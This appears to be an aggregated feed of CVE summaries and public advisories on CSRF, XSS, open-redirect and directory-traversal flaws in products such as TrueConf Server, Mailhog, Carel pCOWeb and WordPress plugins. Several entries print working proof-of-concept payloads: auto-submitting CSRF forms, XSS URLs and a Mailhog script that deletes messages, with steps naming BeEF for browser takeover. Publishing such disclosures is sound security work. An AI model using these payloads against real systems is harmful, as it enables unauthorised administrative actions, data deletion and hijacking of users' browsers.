A cross-site request forgery (CSRF) vulnerability in Jenkins Deployment Dashboard Plugin 1.0.10 and earlier allows attackers to connect to an attacker-specified HTTP URL using attacker-specified credentials.

CVE-2022-34797: Jenkins Security Advisory 2022-06-30

Jenkins Build Notifications Plugin 1.5.0 and earlier stores tokens unencrypted in its global configuration files on the Jenkins controller where they can be viewed by users with access to the Jenkins controller file system.

CVE-2022-34800: Jenkins Security Advisory 2022-06-30

The device suffers from multiple vulnerabilities including: Default Credentials, CSRF, Authenticated Stored XSS and Open Redirect.

Title: Carel pCOWeb HVAC BACnet Gateway 2.1.0 Unauthenticated Directory Traversal  
Advisory ID: ZSL-2022-5709  
Type: Local/Remote  
Impact: Exposure of System Information, Exposure of Sensitive Information  
Risk: (4/5)  
Release Date: 30.06.2022

**Summary**

pCO sistema is the solution CAREL offers its customers for managing HVAC/R applications and systems. It consists of programmable controllers, user interfaces, gateways and communication interfaces, remote management systems to offer the OEMs working in HVAC/R a control system that is powerful yet flexible, can be easily interfaced to the more widely-used Building Management Systems, and can also be integrated into proprietary supervisory systems.

**Description**

The device suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.

**Vendor**

CAREL INDUSTRIES S.p.A. - https://www.carel.com

**Affected Version**

Firmware: A2.1.0 - B2.1.0  
Application Software: 2.15.4A  
Software version: v16 13020200

**Tested On**

GNU/Linux 4.11.12 (armv7l)  
thttpd/2.29

**Vendor Status**

\[10.05.2022\] Vulnerability discovered.  
\[27.05.2022\] Vendor contacted.  
\[27.05.2022\] Vendor responds creating request ID 00027344. Will come back soon with an answer.  
\[29.06.2022\] No response from the vendor.  
\[30.06.2022\] Public security advisory released.

**PoC**

carelpco\_dir.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[30.06.2022\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

Carel pCOWeb HVAC BACnet Gateway 2.1.0 Unauthenticated Directory Traversal

A vulnerability classified as problematic was found in TrueConf Server 4.3.7. This vulnerability affects unknown code of the file /admin/service/stop/. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

    TrueConf Server v4.3.7 Multiple Remote Web Vulnerabilities
    
    
    Vendor: TrueConf LLC
    Product web page: https://www.trueconf.com
    Affected version: 4.3.7.12255 and 4.3.7.12219
    
    Summary: TrueConf Server is a powerful, high-quality and highly secured
    video conferencing software server. It is specially designed to work with
    up to 250 participants in a multipoint conference over LAN or VPN networks.
    TrueConf Server requires no hardware and includes client applications for
    all popular platforms, making it an easy-to-set up, unified communications
    solution.
    
    Desc: The administration interface allows users to perform certain actions
    via HTTP requests without performing any validity checks to verify the requests.
    This can be exploited to perform certain actions with administrative privileges
    if a logged-in user visits a malicious web site.
    
    Input passed via the 'redirect_url' GET parameter is not properly verified before
    being used to redirect users. This can be exploited to redirect a user to an
    arbitrary website e.g. when a user clicks a specially crafted link to the affected
    script hosted on a trusted domain.
    
    TrueConf also suffers from multiple stored, reflected and DOM XSS issues when
    input passed via several parameters to several scripts is not properly sanitized
    before being returned to the user. This can be exploited to execute arbitrary HTML
    and script code in a user's browser session in context of an affected site.
    
    
    Tested on: Microsoft Windows 7 Professional SP1 (EN)
               Apache/2.4.17 (Win32)
               PHP/5.4.41
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                @zeroscience
    
    
    Advisory ID: ZSL-2017-5393
    Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5393.php
    
    
    01.11.2016
    
    --
    
    
    CSRF Stored XSS:
    ----------------
    
    <html>
      <body>
        <form action="http://127.0.0.1:8888/admin/conferences/applyCreate" method="POST">
          <input type="hidden" name="send&#95;invite&#95;mail" value="1" />
          <input type="hidden" name="invitation&#95;type" value="&#45;1" />
          <input type="hidden" name="hide&#95;invitation&#95;type" value="&#45;1" />
          <input type="hidden" name="date" value="22&#46;01&#46;2017" />
          <input type="hidden" name="time&#45;field" value="17&#58;27" />
          <input type="hidden" name="time&#95;zone" value="60" />
          <input type="hidden" name="subtype" value="3" />
          <input type="hidden" name="podiums" value="6" />
          <input type="hidden" name="cid" value="&#92;c&#92;dfa95f7e1d" />
          <input type="hidden" name="key" value="dfa95f7e1d" />
          <input type="hidden" name="topic" value="<script>alert&#40;&apos;XSS&apos;&#41;<&#47;script>" />
          <input type="hidden" name="description" value="" />
          <input type="hidden" name="owner" value="" />
          <input type="hidden" name="gconf&#45;edit" value="ok" />
          <input type="hidden" name="webTtype" value="0" />
          <input type="submit" value="Submit form" />
        </form>
      </body>
    </html>
    
    
    
    Reflected XSS:
    --------------
    
    http://127.0.0.1:8888/admin/conferences/get-all-status/?keys[]=<img src=j onerror=confirm(251) >
    http://127.0.0.1:8888/admin/conferences/list/?sort=status%26'%22()%26%25<div><ScRiPt%20>prompt(251)</ScRiPt>
    http://127.0.0.1:8888/admin/group/list/?checked_group_id=0001&sort=name
    http://127.0.0.1:8888/admin/group/list/?checked_group_id=' onmouseover=confirm(251) ?
    
    
    
    DOM XSS:
    --------
    
    http://127.0.0.1:8888/admin/group?'\><script>confirm("XSS")</script>
    http://127.0.0.1:8888/admin/conferences/list/?domxss=javascript:domxssExecutionSink(1,"'\"><script>alert("XSS")</script>
    
    
    
    Open Redirect:
    --------------
    
    Request:
    
    GET /admin/general/change-lang?lang_on=en&redirect_url=http://www.zeroscience.mk HTTP/1.1
    Host: 127.0.0.1:8888
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*
    
    Response:
    
    HTTP/1.1 302 Found
    Date: Thu, 22 Sep 2016 21:15:40 GMT
    Server: Apache
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: http://www.zeroscience.mk
    Content-Length: 0
    Keep-Alive: timeout=5, max=75
    Connection: Keep-Alive
    Content-Type: text/html; charset=utf-8
    
    
    
    CSRF Stop Web Service:
    ----------------------
    
    <html>
      <body>
        <form action="http://127.0.0.1/admin/service/stop/" method="POST">
          <input type="submit" value="Submit form" />
        </form>
      </body>
    </html>

CVE-2017-20120: Offensive Security’s Exploit Database Archive

Silverstripe silverstripe/assets through 1.10 allows XSS.

CVE-2022-29858: Security Releases

Marval MSM v14.19.0.12476 is vulnerable to Cross Site Request Forgery (CSRF). An attacker can disable the 2FA by sending the user a malicious form.

**Work smarter with Marval**

Our powerful Enterprise Service Management solution drives productivity and delivers exceptional customer service. Available as SaaS or on premises, this out of the box, ITIL aligned ITSM solution seamlessly integrates with all your business apps to transparently share data between departments to help your organisation make informed decisions faster.

Learn more

**Solutions that make ITSM all about you**

Improve control & accountability | Boost performance & processes | Optimise service delivery | Reduce operational costs | Enhance customer experiences

Discover more

**The power of AI and ML**

Combining Artificial Intelligence (AI), Machine Learning (ML) and data analytics, Marval helps you access real-time actionable insights, automate end-to-end business processes, rapidly resolve issues, automatically prevent incidents and make smarter decisions.

Learn more

**Empowering enterprises**

From the IT Service Desk to Human Resources, the Finance team and beyond, our enterprise ready Service Management solution connects people, functions, and systems to improve control, drive productivity, reduce costs and enhance customer experiences across the organization.

Find your ideal ITSM solution

**Council kick starts digital transformation**

Read more

**Hospital reduces service desk calls**

Read more

**Who we work with**

**About Marval**

With over 30 years in the ITSM business, Marval offers unrivalled industry knowledge and expertise combined with innovative system design to ensure service levels, governance and compliance are met, while enabling support teams to deliver the best possible service to colleagues and consumers.

Find out more

CVE-2022-31886: Future Proof your IT Service Management

Benjamin BALET Jorani v1.0 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /application/controllers/Users.php.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-34134: Several vulnerabilities · Issue #369 · bbalet/jorani

Mailhog version 1.0.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS)# Google Dork: https://www.shodan.io/search?query=mailhog ( > 3500)# Date: 06.18.2022# Exploit Author: Vulnz# Vendor Homepage: https://github.com/mailhog/MailHog# Software Link: https://github.com/mailhog/MailHog# Version: 1.0.1# Tested on: Windows,Linux,Docker# CVE : N/AExplanation:Malicious users have the ability to send API requests to localhost and this request will be executed without any additional checks. As long as CSRF exists and unrestricted API calls as well, XSS could lead any API calls including  email deletion, sending, reading or any other call.Steps to reproduce:   1.   Create malicious attachment with payloads stated below   2.   Attach malicious file to email with payload (XSS)   3.   Send email   4.   Wait for victim to open email   5.   Receive data, get control of victim browser using Beef framework, or manipulate with API dataProof of Concept:<script>var XMLHttpFactories = [function () {    return new XMLHttpRequest()},function () {    return new ActiveXObject("Msxml2.XMLHTTP")},function () {    return new ActiveXObject("Msxml3.XMLHTTP")},function () {    return new ActiveXObject("Microsoft.XMLHTTP")}];function createXMLHTTPObject() {    var xmlhttp = false;    for (var i=0;i<XMLHttpFactories.length;i++) {        try {            xmlhttp = XMLHttpFactories[i]();        }        catch (e) {            continue;        }        break;    }    return xmlhttp;}var xhr = createXMLHTTPObject();xhr.open("DELETE", "http://localhost:8025/api/v1/messages", true);xhr.onreadystatechange = function(){    if (xhr.readyState == 4)        alert("Request completed, with the following status code: " +xhr.status);}xhr.send("");</script>

Mailhog 1.0.1 Cross Site Scripting

WordPress Plugin UK Cookie is prone to a cross-site request forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application; other attacks are also possible. WordPress Plugin UK Cookie version 1.1 is vulnerable; other versions may also be affected.

There is CSRF security vulnerability in uk-cookie plugin version 1.1 and using it attacker can insert XSS to front page of WordPress installation. Version 1.1 is the latest (checked 2013-06-06) and I did not test older versions.

    <html>
    <body>
    <form action="https://example.com/wp-admin/options.php" method="POST">
    <input type="hidden" name="option&#95;page" value="cookie&#95;plugin&#95;options" />
    <input type="hidden" name="action" value="update" />
    <input type="hidden" name="&#95;wpnonce" value="e909307b13" />
    <input type="hidden" name="&#95;wp&#95;http&#95;referer" value="&#47;wp&#47;wp&#45;admin&#47;options&#45;general&#46;php&#63;page&#61;cookie&#45;alarm&#45;page&amp;settings&#45;updated&#61;true" />
    <input type="hidden" name="cookiewarn&#95;options&#91;warn&#95;text&#93;" value="&lt;script&gt;alert&#40;&apos;hacked&apos;&#41;&lt;&#47;script&gt;" />
    <input type="hidden" name="cookiewarn&#95;options&#91;redirect&#93;" value="https&#58;&#47;&#47;github&#46;com&#47;wpscanteam&#47;wpscan&#47;" />
    <input type="hidden" name="cookiewarn&#95;options&#91;ok&#95;text&#93;" value="Yes" />
    <input type="hidden" name="cookiewarn&#95;options&#91;notok&#95;text&#93;" value="No" />
    <input type="submit" value="Submit form" />
    </form>
    </body>
    </html>

CVE-2013-2180: CVE-2012-5856 uk-cookie plugin XSS · Issue #184 · wpscanteam/wpscan

The MyCSS WordPress plugin through 1.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

Tag

#csrf